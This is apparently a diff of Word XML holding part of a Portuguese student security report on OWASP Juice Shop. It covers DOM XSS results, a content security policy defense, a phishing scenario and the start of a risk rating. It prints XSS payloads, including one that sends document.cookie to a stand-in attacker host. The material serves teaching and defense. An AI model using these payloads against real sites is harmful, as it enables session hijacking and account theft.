+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="33936E77" wp14:editId="2D1290D4">
+            <wp:extent cx="5943600" cy="2566670"/>
+            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
+            <wp:docPr id="627233384" name="Picture 18" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="627233384" name="Picture 18" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId23" cstate="print">
+                      <a:extLst>
+                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                        </a:ext>
+                      </a:extLst>
+                    </a:blip>
+                    <a:srcRect/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5943600" cy="2566670"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                    <a:noFill/>
+                    <a:ln>
+                      <a:noFill/>
+                    </a:ln>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Caption"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Figura </w:t>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="begin"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:instrText xml:space="preserve"> SEQ Figura \* ARABIC </w:instrText>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="separate"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>15</w:t>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="end"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> - Procurar por "Lemon" na barra de pesquisa</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:keepNext/>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1BF7F8C1" wp14:editId="25EA6ADE">
+            <wp:extent cx="5417227" cy="2700131"/>
+            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
+            <wp:docPr id="119859997" name="Picture 20"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="Picture 7"/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId24" cstate="print">
+                      <a:extLst>
+                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                        </a:ext>
+                      </a:extLst>
+                    </a:blip>
+                    <a:srcRect/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5430866" cy="2706929"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                    <a:noFill/>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Caption"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Figura </w:t>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="begin"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:instrText xml:space="preserve"> SEQ Figura \* ARABIC </w:instrText>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="separate"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>16</w:t>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="end"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> - Procurar por "Lemon1"  na barra de endereço</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:i/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>O element</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>o</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> HTML que é </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">usado para apresentar o texto dos critérios de pesquisa é o </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:i/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>&lt;/span&gt;.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="720"/>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t>&lt;span _ngcontent-ng-c627343222="" id="searchValue"&gt;Lemon1&lt;/span&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="720"/>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="720"/>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Head2"/>
+      </w:pPr>
+      <w:r>
+        <w:t>B. – Desafio DOM XSS</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Para"/>
+        <w:keepNext/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+          <w:lang w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="172325F7" wp14:editId="2C03B95A">
+            <wp:extent cx="5840764" cy="2721023"/>
+            <wp:effectExtent l="0" t="0" r="7620" b="3175"/>
+            <wp:docPr id="913753933" name="Picture 22"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="Picture 8"/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId25" cstate="print">
+                      <a:extLst>
+                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                        </a:ext>
+                      </a:extLst>
+                    </a:blip>
+                    <a:srcRect/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5850664" cy="2725635"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                    <a:noFill/>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Caption"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Figura </w:t>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="begin"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:instrText xml:space="preserve"> SEQ Figura \* ARABIC </w:instrText>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="separate"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>17</w:t>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="end"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> - Resultado da injeção do texto &lt;iframe src="javascript:alert('xss')"&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Head2"/>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>C.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:keepNext/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="46F792A5" wp14:editId="5BC83E1D">
+            <wp:extent cx="5943600" cy="2814320"/>
+            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
+            <wp:docPr id="978197147" name="Picture 23" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="978197147" name="Picture 23" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId26" cstate="print">
+                      <a:extLst>
+                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                        </a:ext>
+                      </a:extLst>
+                    </a:blip>
+                    <a:srcRect/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5943600" cy="2814320"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                    <a:noFill/>
+                    <a:ln>
+                      <a:noFill/>
+                    </a:ln>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Caption"/>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Figura </w:t>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="begin"/>
+      </w:r>
+      <w:r>
+        <w:instrText xml:space="preserve"> SEQ Figura \* ARABIC </w:instrText>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="separate"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:t>18</w:t>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="end"/>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> - Resultado da injeção do texto </w:t>
+      </w:r>
+      <w:r>
+        <w:t>&lt;iframe width="100%" height="166" scrolling="no" frameborder="no" allow="autoplay" src="https://w.soundcloud.com/player/?url=https%3A//api.soundcloud.com/tracks/771984076"&gt;&lt;/iframe&gt;.</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Head2"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ParaContinue"/>
+        <w:rPr>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Uma política de segurança de conteúdo (CSP) permite ao servidor indicar ao navegador quais recursos podem ser carregados e executados, funcionando como uma camada de defesa contra ataques XSS. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ParaContinue"/>
+        <w:rPr>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Segundo o artigo da Auth0 “Defending against XSS with CSP”, a CSP permite controlar de forma precisa quais scripts e iframes são permitidos, bloqueando qualquer código não autorizado. Neste trabalho, tivemos dois exemplos de ataques: um &lt;iframe src="javascript:alert('xss')"&gt;, que tenta executar código JavaScript diretamente via o atributo src de um iframe, e um &lt;iframe&gt; que carrega o player do SoundCloud, que poderia ser usado para inserir conteúdo malicioso. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ParaContinue"/>
+        <w:rPr>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Com uma CSP bem definida, estes ataques podem ser impedidos enquanto se mantém a funcionalidade legítima da aplicação. Por exemplo, se definirmos o cabeçalho HTTP como default-src 'self'; script-src 'self' 'nonce-&lt;aleatório&gt;'; frame-src 'self' https://w.soundcloud.com/; object-src 'none'; base-uri 'self'; form-action 'self';, apenas scripts inline que contenham o "nonce" gerado pelo servidor serão executados, bloqueando qualquer script injetado pelo atacante, como no caso do iframe com javascript:alert('xss'). </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ParaContinue"/>
+        <w:rPr>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">A directiva frame-src restringe iframes às origens autorizadas, permitindo o player do SoundCloud mas bloqueando iframes externos não autorizados. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ParaContinue"/>
+        <w:rPr>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">As directivas adicionais object-src 'none', base-uri 'self' e form-action 'self' reforçam a proteção, bloqueando plugins, evitando alterações da base de URLs e limitando envios de formulários a domínios confiáveis. O uso de nonces elimina a necessidade de 'unsafe-inline', garantindo que apenas scripts explicitamente autorizados são executados. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ParaContinue"/>
+        <w:rPr>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:t>Assim, mesmo que exista uma vulnerabilidade de XSS refletida ou DOM XSS, a CSP impede a execução de código malicioso, mantendo a aplicação segura e funcional.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ParaContinue"/>
+        <w:rPr>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Head1"/>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>eNGENHARI SOCIAL E OUTROS ATAQUES</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Head2"/>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Para"/>
+        <w:rPr>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Ao se injectar &lt;iframe src="javascript:alert('xss')"&gt; no campo de pesquisa do OWASP Juice Shop através do URL, e o navegador executa o JavaScript mostrando o alerta. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Para"/>
+        <w:rPr>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Num ataque real de engenharia social, o atacante modificaria o payload para &lt;iframe src="javascript:fetch('https://atacante.com/?c='+document.cookie)"&gt; e enviaria um link malicioso disfarçado num email de phishing tipo "Ganhou 50% desconto!" ou "Alerta de segurança urgente!". Quando a vítima clica, o cookie "token" é enviado para o atacante. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Para"/>
+        <w:rPr>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Esse token é normalmente um JWT com dados de autenticação do utilizador. Com ele, o atacante tem acesso total à conta sem precisar de password, podendo fazer compras fraudulentas, roubar dados pessoais e, se for admin, controlar todo o sistema. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Para"/>
+        <w:rPr>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:t>As defesas principais são usar a flag HttpOnly no cookie, implementar CSP, sanitizar inputs e educar utilizadores para desconfiarem de links suspeitos.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Head2"/>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Para"/>
+        <w:rPr>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:t>Um atacante descobre uma vulnerabilidade XSS no campo de pesquisa de uma aplicação web que não trata correctamente o que o utilizador escreve. Ele cria um URL malicioso que tenta aproveitar a falha e envia esse link às vítimas por phishing. Quando a vítima clica, o código malicioso pode correr no browser e enviar o token de sessão para o servidor do atacante, que depois usa esse token para aceder à conta da vítima sem precisar de credenciais.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ParaContinue"/>
+        <w:rPr>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ParaContinue"/>
+        <w:rPr>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ParaContinue"/>
+        <w:rPr>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ParaContinue"/>
+        <w:rPr>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ParaContinue"/>
+        <w:rPr>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ParaContinue"/>
+        <w:rPr>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ParaContinue"/>
+        <w:rPr>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ParaContinue"/>
+        <w:rPr>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:t>De seguida será descrito um possível vetor de ataque fazendo uso dos seguintes fatores:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ParaContinue"/>
+        <w:rPr>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ParaContinue"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="31"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>Fatores de Vulnerabilidade</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> (</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t>V</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t>ulneratibility factors</w:t>
+      </w:r>
+      <w:r>
+        <w:t>)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ParaContinue"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="26"/>
+        </w:numPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ParaContinue"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="31"/>
+        </w:numPr>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>Ease of Discovery (7/10):</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> A falha é relativamente fácil de encontrar. Qualquer pessoa que teste o campo de pesquisa com caracteres especiais ou scripts simples pode perceber que a aplicação não filtra corretamente a entrada. Não é necessário ter conhecimentos avançados de programação para identificar este tipo de vulnerabilidade, tornando-a acessível mesmo a atacantes com experiência moderada.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ParaContinue"/>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ParaContinue"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="31"/>
+        </w:numPr>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>Ease of Exploit (9/10):</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> A exploração é muito simples. Depois de descobrir a vulnerabilidade, o atacante só precisa de criar um link ou uma página com código malicioso que aproveite a falha. Não são necessárias ferramentas complexas nem processos longos; basta que a vítima interaja com o link ou página preparada pelo atacante.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ParaContinue"/>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ParaContinue"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="31"/>
